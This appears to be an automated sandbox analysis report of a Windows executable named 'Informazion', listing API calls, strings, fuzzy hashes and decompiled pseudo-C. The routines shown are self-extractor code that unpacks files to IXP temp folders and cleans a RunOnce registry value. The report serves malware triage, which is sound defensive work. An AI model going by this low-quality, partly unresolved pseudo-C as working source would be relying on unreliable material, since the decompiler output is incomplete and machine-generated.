Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: c26e249b4af3392c0508b032d5f49962cae78291bc0a3ebcf72e5c6c276314af
Instruction ID: d6f8028b0dd1b6fce9161af158e11c56441cdefbaa459acc9f66b91d68158a2d
Opcode Fuzzy Hash: c26e249b4af3392c0508b032d5f49962cae78291bc0a3ebcf72e5c6c276314af
Instruction Fuzzy Hash: 96515E25A0CA858AEB15BF24E8482FD6BA1FB45B94F844172DA6D83799DF3CD519C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C518790 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 00007FF64C51879B

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
Instruction ID: 0dbf36e9131862b72be0557867005d52e74686fba62dce42004ff1240dc4298c
Opcode Fuzzy Hash: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
Instruction Fuzzy Hash: 83B09210E29402C1D608BF269C8906827A0BB58304FC10832C01DC0220DE5C92AA8700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C5161EC Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97
registryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 28%

			E00007FF67FF64C5161EC(long long __rbx, void* __rdx, long long _a8) {
				signed int _v24;
				char _v296;
				char _v312;
				long long _v328;
				signed int _t23;
				char _t24;
				signed int _t28;
				long _t29;
				long _t31;
				void* _t34;
				char _t44;
				void* _t47;
				signed long long _t52;
				intOrPtr _t60;
				intOrPtr _t61;
				char* _t67;
				void* _t68;
				void* _t82;
				void* _t83;

				_t77 = __rdx;
				_a8 = __rbx;
				_t52 =  *0x4c51c008; // 0xdeba5460e397
				_v24 = _t52 ^ _t83 - 0x00000160;
				_t60 =  *0x4c51d608; // 0x22759540b30
				goto 0x4c51626e;
				if ( *0x4c51cd04 != 0) goto 0x4c51624c;
				if ( *0x4c51de60 != 0) goto 0x4c51624c;
				SetFileAttributesA(??, ??); // executed
				DeleteFileA(??); // executed
				_t61 =  *((intOrPtr*)(_t60 + 8));
				LocalFree(??);
				LocalFree(??);
				if (_t61 != 0) goto 0x4c516214;
				_t23 =  *0x4c51cd00; // 0x0
				if (_t23 == 0) goto 0x4c516317;
				if ( *0x4c51cd04 != 0) goto 0x4c516317;
				if ( *0x4c51de60 != 0) goto 0x4c516317;
				_t67 =  &_v296;
				_t6 = _t77 + 0x7ffffefa; // 0x7ffffffe
				if (_t6 == 0) goto 0x4c5162d3;
				_t24 =  *((intOrPtr*)(0x4c51d610 -  &_v296 + _t67));
				_t44 = _t24;
				if (_t44 == 0) goto 0x4c5162d3;
				 *_t67 = _t24;
				_t68 = _t67 + _t61;
				_t78 = __rdx - _t61;
				if (_t44 != 0) goto 0x4c5162b5;
				_t57 =  !=  ? _t68 : _t68 - 1;
				 *((char*)( !=  ? _t68 : _t68 - 1)) = 0;
				if (( *0x4c51de64 & 0x00000020) == 0) goto 0x4c5162f4;
				E00007FF67FF64C517C40( !=  ? _t68 : _t68 - 1, _t61,  &_v296, __rdx - _t61, _t82);
				SetCurrentDirectoryA(??); // executed
				E00007FF67FF64C51204C(_t61,  &_v296, _t78, _t82);
				_t28 =  *0x4c51cd00; // 0x0
				_t47 =  *0x4c51de78 - 1; // 0x3
				if (_t47 == 0) goto 0x4c516387;
				if (_t28 == 0) goto 0x4c516387;
				if ( *0x4c51c7d0 == 0) goto 0x4c516387;
				r9d = 0x20006;
				r8d = 0;
				_v328 =  &_v312;
				_t29 = RegOpenKeyExA(??, ??, ??, ??, ??); // executed
				if (_t29 != 0) goto 0x4c516387;
				RegDeleteValueA(??, ??); // executed
				_t31 = RegCloseKey(??);
				 *0x4c51cd00 =  *0x4c51cd00 & 0x00000000;
				return E00007FF67FF64C518470(_t31, _t34, _v24 ^ _t83 - 0x00000160);
			}

0x7ff64c5161ec
0x7ff64c5161ec
0x7ff64c5161f9
0x7ff64c516203
0x7ff64c51620b
0x7ff64c516212
0x7ff64c51621e
0x7ff64c516227
0x7ff64c516231
0x7ff64c516240
0x7ff64c51624f
0x7ff64c516253
0x7ff64c516262
0x7ff64c516271
0x7ff64c516273
0x7ff64c516280
0x7ff64c51628d
0x7ff64c51629a
0x7ff64c5162b0
0x7ff64c5162b5
0x7ff64c5162bf
0x7ff64c5162c1
0x7ff64c5162c5
0x7ff64c5162c7
0x7ff64c5162c9
0x7ff64c5162cb
0x7ff64c5162ce
0x7ff64c5162d1
0x7ff64c5162da
0x7ff64c5162e5
0x7ff64c5162e8
0x7ff64c5162ef
0x7ff64c5162fb
0x7ff64c51630c
0x7ff64c516311
0x7ff64c516317
0x7ff64c51631e
0x7ff64c516322
0x7ff64c51632b
0x7ff64c516332
0x7ff64c516338
0x7ff64c51633b
0x7ff64c51634e
0x7ff64c51635c
0x7ff64c51636a
0x7ff64c51637b
0x7ff64c516387
0x7ff64c5163ae

APIs

SetFileAttributesA.KERNELBASE ref: 00007FF64C516231
DeleteFileA.KERNELBASE ref: 00007FF64C516240
LocalFree.KERNEL32 ref: 00007FF64C516253
LocalFree.KERNEL32 ref: 00007FF64C516262
SetCurrentDirectoryA.KERNELBASE ref: 00007FF64C5162FB
RegOpenKeyExA.KERNELBASE ref: 00007FF64C51634E
RegDeleteValueA.KERNELBASE ref: 00007FF64C51636A
RegCloseKey.ADVAPI32 ref: 00007FF64C51637B

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF64C51629C
wextract_cleanup0, xrefs: 00007FF64C516363
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00007FF64C516340

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
API String ID: 3049360512-3137473940
Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
Instruction ID: 94b9cdb525135e36a29d60f0afd0270da6c40700a7852675dc9f55dc7e1d973a
Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
Instruction Fuzzy Hash: 63510921E1C68286EB19BF18E8483BD7FA0FB85B45F444132CA6D83794CF6DE868C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C51473C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 115
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE ref: 00007FF64C5147AE
WaitForSingleObject.KERNEL32 ref: 00007FF64C5147CA
GetExitCodeProcess.KERNELBASE ref: 00007FF64C5147E0
CloseHandle.KERNEL32 ref: 00007FF64C514881
CloseHandle.KERNEL32 ref: 00007FF64C514892
GetLastError.KERNEL32 ref: 00007FF64C5148BE
FormatMessageA.KERNEL32 ref: 00007FF64C5148EF

Strings

, xrefs: 00007FF64C51479C

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-3916222277
Opcode ID: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
Instruction ID: 8e59ad0c81c0bca3a7e5ed40af9ebd5fa73b74dad34f2b30c51fbc941b4392d4
Opcode Fuzzy Hash: 98467f424fe36bd15bb507385cdbd18d0c765d323d878b3b0929ff50d27d6618
Instruction Fuzzy Hash: F7512C32D1C6818AE768BF18E45837EBBA0FB88755F045236D66D867A5CF7CD464CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C512318 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00007FF64C51236D
RegQueryValueExA.KERNELBASE ref: 00007FF64C51239C
RegCloseKey.KERNELBASE ref: 00007FF64C5123B7
RegOpenKeyExA.ADVAPI32 ref: 00007FF64C5123EE
RegQueryInfoKeyA.ADVAPI32 ref: 00007FF64C512436

Strings

System\CurrentControlSet\Control\Session Manager, xrefs: 00007FF64C51235F
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00007FF64C5123E0
PendingFileRenameOperations, xrefs: 00007FF64C51238A

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
Instruction ID: 2f6576357d7aae7eb32cdb8f15e408b87da1dcec69eb8826135c6efcd48d0ccc
Opcode Fuzzy Hash: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
Instruction Fuzzy Hash: 75316F32A0CB81CAD724AF29F8445BDBBA4FB88754F444536EA6D83B58DF38D560CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C5163B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FF67FF64C5163B8(long long __rbx, void* __rcx, void* __rdx, void* __r9, void* __r10, long long _a24) {
				signed int _v40;
				char _v312;
				void* __rsi;
				void* __rbp;
				long _t11;
				void* _t19;
				signed long long _t30;
				void* _t48;
				void* _t49;
				void* _t50;

				_a24 = __rbx;
				_t30 =  *0x4c51c008; // 0xdeba5460e397
				_v40 = _t30 ^ _t50 - 0x00000140;
				_t49 = __rcx;
				r9d = 0;
				_t3 =  &_v312; // 0xf4
				E00007FF67FF64C51114C(_t3, __rdx, "IXP%03d.TMP", __r9);
				E00007FF67FF64C511008(__rdx, __rdx, _t49, __r10);
				_t4 =  &_v312; // 0xf4
				E00007FF67FF64C517BA8(0x104, _t30 ^ _t50 - 0x00000140, __rbx, __rdx, _t48, _t49, _t4); // executed
				RemoveDirectoryA(??); // executed
				_t11 = GetFileAttributesA(??); // executed
				if (_t11 == 0xffffffff) goto 0x4c5164b6;
				if (1 - 0x190 < 0) goto 0x4c5163e3;
				r8d = 0;
				if (GetTempFileNameA(??, ??, ??, ??) == 0) goto 0x4c516490;
				DeleteFileA(??);
				CreateDirectoryA(??, ??);
				return E00007FF67FF64C518470(1, _t19, _v40 ^ _t50 - 0x00000140);
			}

0x7ff64c5163b8
0x7ff64c5163c7
0x7ff64c5163d1
0x7ff64c5163e0
0x7ff64c5163e3
0x7ff64c5163f2
0x7ff64c5163f7
0x7ff64c516409
0x7ff64c51640e
0x7ff64c51641b
0x7ff64c516423
0x7ff64c516432
0x7ff64c516441
0x7ff64c516449
0x7ff64c516455
0x7ff64c516469
0x7ff64c516473
0x7ff64c516484
0x7ff64c5164b4

APIs

Part of subcall function 00007FF64C51114C: _vsnprintf.MSVCRT ref: 00007FF64C511189

RemoveDirectoryA.KERNELBASE(0000000A,00007FF64C512CE1), ref: 00007FF64C516423
GetFileAttributesA.KERNELBASE ref: 00007FF64C516432
GetTempFileNameA.KERNEL32 ref: 00007FF64C51645B
DeleteFileA.KERNEL32 ref: 00007FF64C516473
CreateDirectoryA.KERNEL32 ref: 00007FF64C516484
CreateDirectoryA.KERNELBASE ref: 00007FF64C5164BB

Strings

IXP%03d.TMP, xrefs: 00007FF64C5163E6
IXP, xrefs: 00007FF64C51644E

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: IXP$IXP%03d.TMP
API String ID: 1082909758-3932986939
Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
Instruction ID: b611ce5ffd520ca22aca8f4f9211ba3c420ab8893fdf453a13adac5b33f41683
Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
Instruction Fuzzy Hash: B6216131E0C98186E618BF1AA9983FDAE91FB8DB90F848132DD6E83795CF3CD455C600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C518200 Relevance: 12.1, APIs: 8, Instructions: 136
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF64C518964: GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF64C518994
Part of subcall function 00007FF64C518964: GetCurrentProcessId.KERNEL32 ref: 00007FF64C5189A2
Part of subcall function 00007FF64C518964: GetCurrentThreadId.KERNEL32 ref: 00007FF64C5189AE
Part of subcall function 00007FF64C518964: GetTickCount.KERNEL32 ref: 00007FF64C5189BA
Part of subcall function 00007FF64C518964: GetTickCount.KERNEL32 ref: 00007FF64C5189CA
Part of subcall function 00007FF64C518964: QueryPerformanceCounter.KERNEL32 ref: 00007FF64C5189E5

GetStartupInfoW.KERNEL32 ref: 00007FF64C518235
_amsg_exit.MSVCRT ref: 00007FF64C518270
Sleep.KERNEL32 ref: 00007FF64C51827C
_initterm.MSVCRT ref: 00007FF64C51830A
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF64C518337
exit.KERNELBASE ref: 00007FF64C5183C9
_cexit.MSVCRT ref: 00007FF64C5183D8
_ismbblead.MSVCRT ref: 00007FF64C5183F8

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
String ID:
API String ID: 2995914023-0
Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
Instruction ID: e5856798610a6ed7ae0d4860c1988286ff1a6a850afe43534c43c47470eff091
Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
Instruction Fuzzy Hash: 70511631E0CA4286E768BF29E85837D2BA0BB44794F990036D96DC23A5DF3DE965C601

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C5160A4 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 75
memoryCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00007FF67FF64C5160A4(void* __rax, long long __rbx, void* __rdx, void* __rsi, void* __rbp, void* __r8, void* __r9, void* __r10, long long _a8) {
				signed int _v16;
				intOrPtr _v24;
				void* _t12;
				signed int _t13;
				signed int _t16;
				int _t19;
				void* _t22;
				void* _t53;
				void* _t59;

				_t59 = __r8;
				_t55 = __rbp;
				_t54 = __rsi;
				_t42 = __rbx;
				_t41 = __rax;
				_a8 = __rbx;
				r8d = 0;
				_t12 = E00007FF67FF64C515050(__rax, __rbx, "UPROMPT", __rdx, __rsi, __rbp);
				_t13 = LocalAlloc(??, ??);
				_t53 = __rax;
				if (__rax != 0) goto 0x4c51610b;
				_v16 = _v16 & _t13;
				r9d = 0;
				r8d = 0;
				_v24 = 0x10;
				E00007FF67FF64C514DCC("UPROMPT", _t59, __r9, __r10);
				 *0x4c51d544 = E00007FF67FF64C517700();
				goto 0x4c5161d5;
				r8d = _t12;
				_t16 = E00007FF67FF64C515050(_t41, _t42, "UPROMPT", _t53, _t54, _t55);
				if (_t16 != 0) goto 0x4c51615a;
				_v16 = _v16 & _t16;
				r9d = 0;
				r8d = 0;
				_v24 = 0x10;
				E00007FF67FF64C514DCC("UPROMPT", _t59, __r9, __r10);
				LocalFree(??);
				 *0x4c51d544 = 0x80070714;
				goto 0x4c5161d5;
				_t19 = lstrcmpA(??, ??); // executed
				if (_t19 != 0) goto 0x4c51618a;
				LocalFree(??);
				goto 0x4c5161d7;
				_v16 = 4;
				r9d = 0;
				_v24 = 0x20;
				_t22 = E00007FF67FF64C514DCC(_t53, _t53, __r9, __r10);
				LocalFree(??);
				if (_t22 != 6) goto 0x4c5161cb;
				 *0x4c51d544 =  *0x4c51d544 & 0x00000000;
				goto 0x4c516183;
				 *0x4c51d544 = 0x800704c7;
				return 0;
			}

0x7ff64c5160a4
0x7ff64c5160a4
0x7ff64c5160a4
0x7ff64c5160a4
0x7ff64c5160a4
0x7ff64c5160a4
0x7ff64c5160ae
0x7ff64c5160ba
0x7ff64c5160c9
0x7ff64c5160d5
0x7ff64c5160db
0x7ff64c5160dd
0x7ff64c5160e1
0x7ff64c5160e4
0x7ff64c5160e7
0x7ff64c5160f6
0x7ff64c516100
0x7ff64c516106
0x7ff64c51610b
0x7ff64c516118
0x7ff64c51611f
0x7ff64c516121
0x7ff64c516125
0x7ff64c516128
0x7ff64c51612b
0x7ff64c51613a
0x7ff64c516142
0x7ff64c51614e
0x7ff64c516158
0x7ff64c516164
0x7ff64c516172
0x7ff64c516177
0x7ff64c516188
0x7ff64c51618a
0x7ff64c516192
0x7ff64c516198
0x7ff64c5161a7
0x7ff64c5161b1
0x7ff64c5161c0
0x7ff64c5161c2
0x7ff64c5161c9
0x7ff64c5161cb
0x7ff64c5161e1

APIs

Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C515078
Part of subcall function 00007FF64C515050: SizeofResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C515089
Part of subcall function 00007FF64C515050: FindResourceA.KERNEL32 ref: 00007FF64C5150AF
Part of subcall function 00007FF64C515050: LoadResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150C0
Part of subcall function 00007FF64C515050: LockResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150CF
Part of subcall function 00007FF64C515050: memcpy_s.MSVCRT ref: 00007FF64C5150EE
Part of subcall function 00007FF64C515050: FreeResource.KERNEL32(?,?,00000000,00007FF64C512E43), ref: 00007FF64C5150FD

LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF64C513123), ref: 00007FF64C5160C9
LocalFree.KERNEL32 ref: 00007FF64C516142

Part of subcall function 00007FF64C514DCC: LoadStringA.USER32 ref: 00007FF64C514E60
Part of subcall function 00007FF64C514DCC: MessageBoxA.USER32 ref: 00007FF64C514EA0

Part of subcall function 00007FF64C517700: GetLastError.KERNEL32 ref: 00007FF64C517704

Strings

UPROMPT, xrefs: 00007FF64C5160B1, 00007FF64C51610E
, xrefs: 00007FF64C516198
<None>, xrefs: 00007FF64C51615A

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
String ID: $<None>$UPROMPT
API String ID: 957408736-2569542085
Opcode ID: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
Instruction ID: e2026e9860f742bdc75ab8fa5e6117787545f27452bd8277ea0adc232ac5be76
Opcode Fuzzy Hash: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
Instruction Fuzzy Hash: 7D31A175E1C6428BF728BF28E55837E7E60EB85794F405536CA2E82795DF7CD4248B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C515380 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 164filestringCOMMON

Download Yara Rule

APIs

lstrcmpA.KERNEL32 ref: 00007FF64C515407
CreateFileA.KERNELBASE ref: 00007FF64C5154C5
CreateFileA.KERNEL32 ref: 00007FF64C51557E

Strings

*MEMCAB, xrefs: 00007FF64C5153FD

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: CreateFile$lstrcmp
String ID: *MEMCAB
API String ID: 1301100335-3211172518
Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
Instruction ID: 2aeea1c46d981045f8be290d3a0b91c245fe18b97ab8a596e231c04aef9b6500
Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
Instruction Fuzzy Hash: A561C362E0C78186F768BF19A48837D7E91EB45B64F854332CA7E827C1DF7CA4258600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C5158B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 152
timeCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00007FF67FF64C5158B0(void* __ecx, void* __ebp, long long __rbx, void* __rdx, long long __rdi, long long __rsi) {
				void* __rbp;
				int _t48;
				int _t50;
				int _t52;
				void* _t56;
				void* _t62;
				void* _t65;
				intOrPtr _t75;
				void* _t77;
				void* _t98;
				signed long long _t99;
				void* _t105;
				void* _t108;
				intOrPtr _t119;
				CHAR* _t140;
				void* _t143;
				FILETIME* _t153;
				signed long long _t154;
				void* _t156;

				_t138 = __rsi;
				_t62 = __ecx;
				_t98 = _t143;
				 *((long long*)(_t98 + 8)) = __rbx;
				 *((long long*)(_t98 + 0x18)) = __rsi;
				 *((long long*)(_t98 + 0x20)) = __rdi;
				_t144 = _t143 - 0x150;
				_t99 =  *0x4c51c008; // 0xdeba5460e397
				 *(_t98 - 0x68 + 0x40) = _t99 ^ _t143 - 0x00000150;
				_t154 = _t153 | 0xffffffff;
				_t75 =  *0x4c51d5fc; // 0x0
				_t108 = __rdx;
				if (_t75 == 0) goto 0x4c515904;
				if (__ecx != 3) goto 0x4c5158fc;
				E00007FF67FF64C515770(__rdx,  *((intOrPtr*)(__rdx + 0x28)));
				goto 0x4c515ae8;
				_t77 = _t62;
				if (_t77 == 0) goto 0x4c515ade;
				if (_t77 == 0) goto 0x4c515924;
				if (_t77 == 0) goto 0x4c515a29;
				_t65 = _t62 - 0xffffffffffffffff;
				if (_t77 == 0) goto 0x4c51592b;
				if (_t65 == 1) goto 0x4c5158fc;
				goto 0x4c515ae8;
				if ( *((intOrPtr*)( *((intOrPtr*)(__rdx + 8)) + _t154 + 1)) != sil) goto 0x4c515932;
				if ( *((intOrPtr*)(0x4c51d610 + _t154 + 1)) != sil) goto 0x4c515945;
				if (1 + _t65 - 0x104 >= 0) goto 0x4c5158fc;
				if (E00007FF67FF64C51512C(_t154 + 1, __rdx, _t143 - 0x150 + 0x30, 0x4c51d610, __rsi,  *((intOrPtr*)(__rdx + 8)), _t156) == 0) goto 0x4c5158fc;
				if ( *((intOrPtr*)(( *(_t108 + 0x28) << 5) + 0x7ff64c51d044)) == 1) goto 0x4c5158fc;
				if (DosDateTimeToFileTime(??, ??, ??) == 0) goto 0x4c5158fc;
				if (LocalFileTimeToFileTime(_t153) == 0) goto 0x4c5158fc;
				_t48 = SetFileTime(??, ??, ??, ??); // executed
				if (_t48 == 0) goto 0x4c5158fc;
				E00007FF67FF64C515770(_t108,  *(_t108 + 0x28)); // executed
				if ( *((intOrPtr*)(_t108 + 0x34)) != 0) goto 0x4c5159ff;
				goto 0x4c515a06;
				_t50 = SetFileAttributesA(_t140); // executed
				if (_t50 == 0) goto 0x4c5158fc;
				goto 0x4c515ae8;
				_t119 =  *0x4c51c828; // 0x0
				if (_t119 == 0) goto 0x4c515a4a;
				_t52 = SetDlgItemTextA(??, ??, ??);
				_t105 = _t154 + 1;
